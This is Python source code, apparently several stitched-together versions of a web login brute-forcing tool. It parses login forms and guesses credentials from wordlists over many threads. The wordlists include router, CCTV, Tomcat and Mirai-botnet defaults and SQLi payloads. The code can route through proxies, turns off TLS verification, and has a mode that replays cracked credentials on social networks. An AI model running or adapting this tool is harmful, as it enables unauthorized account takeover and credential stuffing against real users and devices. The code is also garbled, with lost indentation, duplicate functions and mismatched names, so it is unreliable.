def do_info(self, input):
'''show info for selected module'''
if not g.current_module:
return
print("-"*64)
utils.pprint_dict_in_order(g.current_module.__info__,
("name", "description"))
print("\nOptions: ")
opts = g.current_module.options
utils.print_table(["Name", "Value", "Description"], *g.current_module.get_opts(*opts))
def run(options, creds):
social_urls = data.social_urls().replace("\t", "").split("\n")
for url in social_urls:
if options.url in url:
social_urls.remove(url)
result = Queue()
#workers = []
try:
for tryCreds in creds:
for url in social_urls:
submit(url, options, tryCreds, result)
# if len(workers) == options.threads:
# do_job(workers)
# del workers[:]
# worker = threading.Thread(
# target = submit,
# args = (url, options, tryCreds, result)
# )
#worker.daemon = True
#workers.append(worker)
#do_job(workers)
#del workers[:]
except KeyboardInterrupt:
printf("[x] Terminated by user!", "bad")
import os
os._exit(0)
except SystemExit:
die("[x] Terminated by system!", "SystemExit")
except Exception as err:
die("[x] ReAuth: Runtime error", err)
finally:
result = list(result.queue)
if len(result) == 0:
printf("[-] No extra valid password found", "bad")
else:
print_table(("Target", "Username", "Password"), *result)
def print_help():
# Print project's help table
print_fast_help()
print("\nOptions:\n")
title = ("Formats", "Examples")
menu = [[
"%-25s" % ("-u <path_to_wordlist>"), "-u /usr/share/wordlists/nmap.lst"
],
[
"%-25s" % ("-p <path_to_wordlist>"),
"-p /usr/share/wordlists/fasttrack.txt"
],
[
"%-25s" % ("-U <username>"),
"-U admin | -U admin:user1 | -U admin,root,user"
], ["%-25s" % ("-t <threads>"), "-t 32"],
["%-25s" % ("-k <false_key>"), "-k 'Invalid username'"]]
utils.print_table(title, *menu)
print("\nModes:\n")
title = ("Attack Modes", "Ony ONE attack mode can be used")
menu = [
["%-25s" % ("--brute [Default]"), "Brute Forcing credentials"],
["%-25s" % ("--httpget"), "HTTP GET Basic Authentication"],
[
"%-25s" % ("--reauth"),
"Checks valid credentials on other social-networks"
],
["%-25s" % ("--sqli [Not Available]"), "SQL Injection bypassing"],
]
utils.print_table(title, *menu)
print("")
title = ("Running Modes", "Descriptions")
menu = [
["%-25s" % ("--proxy"), "Use Proxy each connection"],
["%-25s" % ("--verbose"), "Display more information"],
[
"%-25s" % ("--getproxy"),
"Get proxy list [Auto check connect to target]"
],
]
utils.print_table(title, *menu)
print("\nWordlists:\n")
title = ("Values", "Informations")
menu = [
["%-25s" % ("default"), "Top usernames+passwords"],
["%-25s" % ("router"), "Default router usernames+passwords"],
["%-25s" % ("tomcat"), "Default tomcat usernames+passwords"],
["%-25s" % ("cctv"), "Default cctv usernames+passwords"],
["%-25s" % ("unix"), "Top unix usernames+passwords"],
["%-25s" % ("http"), "Top http usernames+passwords"],
["%-25s" % ("mirai"), "List usernames+passwords used by mirai botnet"],
["%-25s" % ("webshell"), "Common webshell usernames+passwords"],
]
utils.print_table(title, *menu)
print("")
def run(checkedURL, creds, optionThreads, optionProxy, optionVerbose):
social_urls = data.social_urls().replace("\t", "").split("\n")
for url in social_urls:
# BUG double_free()
if checkedURL in url:
social_urls.remove(url)
result = Queue()
workers = []
try:
for tryCreds in creds:
for url in social_urls:
if actions.size_o(workers) == optionThreads:
do_job(workers)
del workers[:]
worker = threading.Thread(target=submit,
args=(url, tryCreds, optionProxy,
optionVerbose, result))
worker.daemon = True
workers.append(worker)
do_job(workers)
del workers[:]
except KeyboardInterrupt:
utils.die("[x] Terminated by user!", "KeyboardInterrupt")
except SystemExit:
utils.die("[x] Terminated by system!", "SystemExit")
except Exception as err:
utils.die("[x] ReAuth: Runtime error", err)
finally:
result = list(result.queue)
if actions.size_o(result) == 0:
utils.printf("[-] No extra valid password found", "bad")
else:
utils.print_table(("Target", "Username", "Password"), *result)
def print_help():
# Print project's help table
print_fast_help()
print("Options: ")
title = ("Formats", "Examples")
menu = [
["%-14s" % ("-u <file_path>"), "-u /opt/wordlists/nmap.lst"],
["%-14s" % ("-p <file_path>"), "-p /opt/wordlists/passwd.txt"],
["%-14s" % ("-U <username>"), "-U admin | -U admin:user1"],
["%-14s" % ("-t <threads>"), "-t 32"],
["%-14s" % ("-T <timeout>"), "-t 25"],
["%-14s" % ("-l <file_path>"), "-l url_list.txt"],
]
print_table(title, *menu)
print("\nRunning mode:")
title = ("Modes", "Descriptions")
menu = [
["%-14s" % ("--proxy"), "Attack using proxies"],
["%-14s" % ("--verbose"), "Display running information"],
]
print_table(title, *menu)
print("\nExtra modes: Combines with attack mode")
title = ("Modes", "Descriptions")
menu = [
["%-14s" % ("--reauth"), "Check credentials on social networks"],
["%-14s" % ("--getproxy"), "Provide new proxy list"],
]
print_table(title, *menu)
print("\nWordlists: Values will be replaced by [-U/-u/-p] options")
title = ("List name", "Descriptions")
menu = [
["%-14s" % ("default"), "Top common users+passwords"],
["%-14s" % ("router"), "Router wordlist"],
["%-14s" % ("tomcat"), "Tomcat manager wordlist"],
["%-14s" % ("cctv"), "CCTV wordlist"],
["%-14s" % ("unix"), "Top Unix wordlist"],
["%-14s" % ("http"), "Top HTTP wordlist"],
["%-14s" % ("mirai"), "Mirai botnet wordlist"],
["%-14s" % ("webshell"), "Webshell wordlist"],
["%-14s" % ("sqli"), "Dynamic SQLi payloads"],
]
print_table(title, *menu)
print("")
def attack(options, loginInfo):
def run_threads(threads, sending, completed, total):
# Run threads
for thread in threads:
sending += 1 # Sending
progress_bar(sending, completed, total)
thread.start()
# Wait for threads completed
for thread in threads:
completed += 1
progress_bar(sending, completed, total)
thread.join()
return sending, completed
### SETTING UP FOR NEW ATTACK ###
if options.attack_mode == "--httpget":
from modules import httpget
attack_module = httpget.submit
elif options.attack_mode == "--loginbrute":
from modules import loginbrute
attack_module = loginbrute.submit
else:
die("[x] Runtime error: Invalid attack mode",
"%s" % (options.attack_mode))
if not loginInfo:
# Test for 2 steps... login?
die("[x] Target check: URL error", "[x] No login request found")
else:
if options.verbose:
printf("[*] Login request has been found!", "good")
tasks = len(options.passwd) * len(options.username)
printf(
"[+] [Tasks: %s] [ID: %s] [Controls: %s]" %
(tasks, loginInfo[0], loginInfo[1][::-1]), "good")
import Queue
result = Queue.Queue()
sending, completed = 0, 0
try:
#### START ATTACK ####
workers = []
for username in options.username:
if "--upwd" in options.extras \
and username not in options.passwd \
and options.options["-p"] is not "sqli":
options.passwd += (username, )
for password in options.passwd:
if len(workers) == options.threads:
sending, completed = run_threads(workers, sending,
completed, tasks)
del workers[:]
worker = threading.Thread(target=attack_module,
args=(options, loginInfo,
[password, username], result))
workers.append(worker)
worker.daemon = True
sending, completed = run_threads(workers, sending, completed, tasks)
del workers[:]
except KeyboardInterrupt:
printf("[x] Terminated by user!", "bad")
global set_break
set_break = True
except SystemExit:
printf("[x] Terminated by system!", "bad")
except Exception as error:
die("[x] Runtime error", error)
finally:
credentials = list(result.queue)
if len(credentials) == 0:
printf("[-] No match found!", "bad")
else:
printf("\n[*] %s valid password[s] found:" % (len(credentials)),
"norm")
if not credentials[0][1]:
print_table(("URL", "Password"),
*[creds[::2] for creds in credentials])
else:
print_table(("Username", "Password"),
*[creds[-2:] for creds in credentials])
printf("")
return credentials
if loginInfo:
check_options(options, loginInfo)
result = attack(options, loginInfo)
if result:
for _result in result:
results.append(_result)
#results.append(result)
if "--reauth" in options.extras:
from extras import reauth
reauth.run(options, result)
except Exception as error:
die("[x] Program stopped", error)
finally:
runtime = time.time() - runtime
try:
if len(options.target) > 0:
if len(results) > 0 and len(options.target) > 1:
printf("[*] Cracked %s target[s]" % (len(results)), "norm")
print_table(("URL", "Username", "Password"), *results)
else:
printf("[x] No target has been cracked", "bad")
except:
pass
printf(
"\n[*] [Elapsed: %0.2f] [%s]" % (
runtime,
time.strftime("%Y-%m-%d %H:%M"),
), "good")
def main(optionURL, setOptions, optionRunMode, setRunOptions):
def do_job(jobs):
for job in jobs:
job.start()
utils.printp
for job in jobs:
job.join()
import time, os, threading
# CHECK IMPORTING ALL LIBS. IMPORT HERE -> CALL HELP_BANNER ONLY FASTER
try:
import mechanize, re, requests # for basichttpauthentication, not useless, use later
except ImportError as err:
utils.die(err, "Try: pip install %s" % (str(err).split(" ")[-1]))
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
try:
from Queue import Queue
except ImportError:
from queue import Queue
result = Queue()
# BUG bad memory management
optionUserlist, optionThreads, optionKeyFalse, optionPasslist = setOptions.values(
)
optionProxy, optionReport, optionVerbose = setRunOptions.values()
try:
optionUserlist = optionUserlist.split("\n")
except:
pass
try:
optionPasslist = optionPasslist.split("\n")
except:
pass
## End of testing
timeStarting = time.time()
# get login form info
# call brute
IS_REGULAR = True
# IF NOT HTTP BASIC AUTHENTICATION, CHECK RESULT AND PARSE LOGIN FORM
proc = tbrowser.startBrowser()
proc.addheaders = [('User-Agent', tbrowser.useragent())]
if optionRunMode not in ["--httpauth"]:
try:
utils.printf("Checking connection...")
proc.open(optionURL)
#TODO PROXY
utils.printf("[*] Connect success!", "good")
loginInfo = tbrowser.parseLoginForm(proc.forms())
if not loginInfo:
utils.die("[x] URL error", "No login field found")
elif actions.size_o(loginInfo[1]) == 1: # Password checking only
utils.printf("[*] Form with password field", "good")
del optionUserlist[:]
optionUserlist = [""]
IS_REGULAR = False
elif actions.size_o(loginInfo[1]) == 2:
utils.printf("[*] Form username+password field", "good")
except Exception as err:
utils.die("[x] Can't connect to target", err)
finally:
proc.close()
#### END OF CHECKING TARGET
sizePasslist = actions.size_o(optionPasslist)
sizeUserlist = actions.size_o(optionUserlist)
workers = []
utils.printf("Starting attack....\nTask count: %s tasks" %
(sizeUserlist * sizePasslist))
############################
# Setting up threads
############################
try:
for password in optionPasslist:
for username in optionUserlist:
username, password = username.replace("\n",
""), password.replace(
"\n", "")
####
# IF HAVE ENOUGH THREAD, DO IT ALL
###
if actions.size_o(workers) == optionThreads:
do_job(workers)
del workers[:]
if optionRunMode == "--brute":
worker = threading.Thread(
target=loginbrute.submit,
args=(optionURL, [password, username
], optionProxy, optionKeyFalse,
optionVerbose, loginInfo, result))
elif optionRunMode == "--httpauth":
worker = threading.Thread(target=httpauth.submit,
args=(optionURL, username,
password, optionProxy,
optionVerbose, result))
worker.daemon = True
workers.append(worker)
######### END SETTING UP THREADS ################
#DO ALL LAST TASKs
do_job(workers)
del workers[:]
### CATCH ERRORS ###
except KeyboardInterrupt: # as error:
# TODO: kill running threads here
utils.die("[x] Terminated by user!", "KeyboardInterrupt")
except SystemExit: # as error
utils.die("[x] Terminated by system!", "SystemExit")
except Exception as error:
utils.die("[x] Runtime error", error)
### ALL TASKS DONE ####
finally:
runtime = time.time() - timeStarting
"""
All threads have been set daemon
Running threads should be stopped after main task done
"""
############################################
# Get result
#
############################################
try:
credentials = list(result.queue)
if actions.size_o(credentials) == 0:
utils.printf("[-] No match found!", "bad")
else:
utils.printf(
"\n[*] %s valid password[s] found:\n" %
(actions.size_o(credentials)), "norm")
if IS_REGULAR:
utils.print_table(("Username", "Password"), *credentials)
else:
if optionRunMode != "--sqli":
utils.print_table(("", "Password"), *credentials)
else:
utils.print_table(("Payload", ""),
*credentials) # TODO: test more
### CREATE REPORT ####
if optionReport:
try:
import reports
optionProxy = "True" if optionProxy else "False"
report_name = "%s_%s" % (time.strftime("%Y.%m.%d_%H.%M"),
optionURL.split("/")[2])
report_path = "%s/%s.txt" % (reports.__path__[0],
report_name)
reports.makeReport(
utils.report_banner(optionURL, optionRunMode,
optionProxy, optionThreads,
credentials, report_name, runtime,
IS_REGULAR), report_path)
utils.printf("\n[*] Report file at:\n%s" % (report_path),
"good")
except Exception as err:
utils.printf("[x] Error while creating report: %s" % (err),
"bad")
except Exception as err:
utils.printf("\n[x] Error while getting result.\n", "bad")
utils.printf(err, "bad")
utils.printf("\n[*] Time elapsed: %0.5s [s]\n" % (runtime), "good")
sys.exit(0)
def main(optionURL, setOptions, optionRunMode, setRunOptions):
def do_job(jobs):
for job in jobs:
job.start()
for job in jobs:
job.join()
import time, os, threading
# CHECK IMPORTING ALL LIBS. IMPORT HERE -> CALL HELP_BANNER ONLY FASTER
try:
import mechanize, re, ssl, requests # for basichttpauthentication, not useless, use later
except ImportError as err:
utils.die(err, "Try: pip install %s" % (str(err).split(" ")[-1]))
try:
_create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
# Legacy Python that doesn't verify HTTPS certificates by default
pass
else:
# Handle target environment that doesn't support HTTPS verification
ssl._create_default_https_context = _create_unverified_https_context
try:
from Queue import Queue
except ImportError:
from queue import Queue
result = Queue()
# BUG bad memory management
optionUserlist, optionThreads, optionKeyFalse, optionPasslist = setOptions.values(
)
optionProxy, optionReport, optionVerbose = setRunOptions.values()
try:
optionUserlist = optionUserlist.split("\n")
except:
#optionUserlist = optionUserlist.readlines()
pass
# TODO Must testing cases with list and file object
try:
optionPasslist = optionPasslist.split("\n")
except:
pass
## End of testing
timeStarting = time.time()
# get login form info
# call brute
sizePasslist = actions.size_o(optionPasslist)
sizeUserlist = actions.size_o(optionUserlist)
proc = tbrowser.startBrowser()
proc.addheaders = [('User-Agent', tbrowser.useragent())]
try:
utils.printf("Checking connection...")
proc.open(optionURL)
#TODO PROXY
loginInfo = tbrowser.getLoginForm(optionURL, proc, optionVerbose)
utils.printf("Connect success!", "good")
except Exception as err:
utils.die("Error while parsing login form", err)
finally:
proc.close()
utils.printf("Starting attack.... %s tasks" %
(sizeUserlist * sizePasslist))
workers = []
trying = 0
try:
for password in optionPasslist:
for username in optionUserlist:
if len(workers) == optionThreads:
do_job(workers)
del workers[:]
if optionRunMode == "--brute":
worker = threading.Thread(
target=loginbrute.submit,
args=(optionURL, username.replace("\n", ""),
password.replace("\n", ""),
sizeUserlist * sizePasslist, optionProxy,
optionKeyFalse, optionVerbose, loginInfo,
result))
worker.daemon = True
workers.append(worker)
#DO ALL LAST TASKs
do_job(workers)
del workers[:]
except KeyboardInterrupt: # as error:
# TODO: kill running threads here
utils.die("Terminated by user!", "KeyboardInterrupt")
except SystemExit: # as error
utils.die("Terminated by system!", "SystemExit")
except Exception as error:
utils.die("Error while running", error)
finally:
runtime = time.time() - timeStarting
"""
All threads have been set daemon
Running threads should be stopped after main task done
"""
############################################
# Get result
#
############################################
try:
credentials = list(result.queue)
if len(credentials) == 0:
utils.printf("[-] No valid password found!", "bad")
else:
utils.printf(
"\n[*] %s valid password[s] found:\n" % (len(credentials)),
"norm")
utils.print_table(("Username", "Password"), *credentials)
if optionReport:
try:
import report
optionProxy = "True" if optionProxy else "False"
report_name = "%s_%s" % (time.strftime("%Y.%m.%d_%H.%M"),
optionURL.split("/")[2])
report_path = "%s/%s.txt" % (reports.__path__[0],
report_name)
reports.makeReport(
utils.report_banner(optionURL, optionRunMode,
optionProxy, optionThreads,
credentials, report_name, runtime),
report_path)
utils.printf("\n[*]Report file at:\n%s" % (report_path),
"good")
except Exception as err:
utils.printf("Error while creating report: %s" % (err),
"bad")
except Exception as err:
utils.printf("\nError while getting result.\n", "bad")
utils.printf(err, "bad")
utils.printf("\nCompleted. Run time: %0.5s [s]\n" % (runtime))
########################################
# Clear resources
#
########################################
try:
optionPasslist.close()
except:
pass
try:
optionUserlist.close()
except:
pass
sys.exit(0)
